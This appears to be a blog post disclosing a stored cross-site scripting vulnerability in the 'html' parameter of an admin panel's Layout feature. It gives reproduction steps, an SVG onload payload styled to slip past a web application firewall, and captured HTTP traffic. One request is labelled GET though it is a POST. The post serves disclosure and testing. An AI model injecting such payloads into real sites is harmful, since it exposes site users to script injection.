- It was noted that the "Layout" functionality was vulnerable to Stored Cross-Site Scripting (XSS) in the "html" parameter
Stored Cross-Site Scripting (XSS) - Layout Functionality
Steps to Reproduce:
- Login with user and visit "Layouts"
- Click on "Create" and enter name for the layout
- Trap the HTTP POST request and in the "html" parameter value enter the Cross-Site Scripting (XSS) payload below
- Upon visiting the newly created layout the payload would execute
"<Svg Only=1 OnLoad=confirm(atob(\"Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ==\"))>"
// HTTP POST Request - Creating New Layout
POST /admin/ HTTP/1.1
Host: 192.168.58.153
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:145.0) Gecko/20100101 Firefox/145.0
[...]
{"schema":"layouts_save","data":{"name":"xss-test-layout-name-test","html":"<Svg Only=1 OnLoad=confirm(atob(\"Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ==\"))>"}}
// HTTP POST Response - Creating New Layout
HTTP/1.1 200 OK
content-type: application/json; charset=utf-8
cache-control: private, no-cache, no-store, max-age=0
vary: Accept-Encoding, Last-Modified, User-Agent
expires: -1
x-powered-by: Total.js
Date: Sun, 26 Oct 2025 16:33:35 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Content-Length: 39
{"success":true,"value":"JE6ar71cU61f"}
// HTTP GET Request - Triggering the Payload
POST /admin/ HTTP/1.1
Host: 192.168.58.153
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:145.0) Gecko/20100101 Firefox/145.0
[...]
{"schema":"layouts_html","data":{"id":"JE6ar71cU61f"}}
// HTTP GET Response - Triggering the Payload
HTTP/1.1 200 OK
content-type: application/json; charset=utf-8
cache-control: private, no-cache, no-store, max-age=0
vary: Accept-Encoding, Last-Modified, User-Agent
expires: -1
x-powered-by: Total.js
Date: Sun, 26 Oct 2025 16:39:17 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Content-Length: 117
{"name":"xss-test-layout-name-test","html":"<Svg Only=1 OnLoad=confirm(atob(\"Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ==\"))>"}
No comments:
Post a Comment